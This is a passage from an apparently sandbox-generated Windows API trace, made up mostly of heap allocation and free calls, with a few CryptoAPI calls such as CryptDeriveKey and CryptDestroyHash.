dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0188.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0188.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0188.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.190] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.190] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0188.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c98 [0188.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0188.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.194] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0188.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0188.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0188.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0188.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.197] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0188.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0188.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0188.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0188.199] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0188.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.200] CryptDestroyHash (hHash=0xa87050) returned 1 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 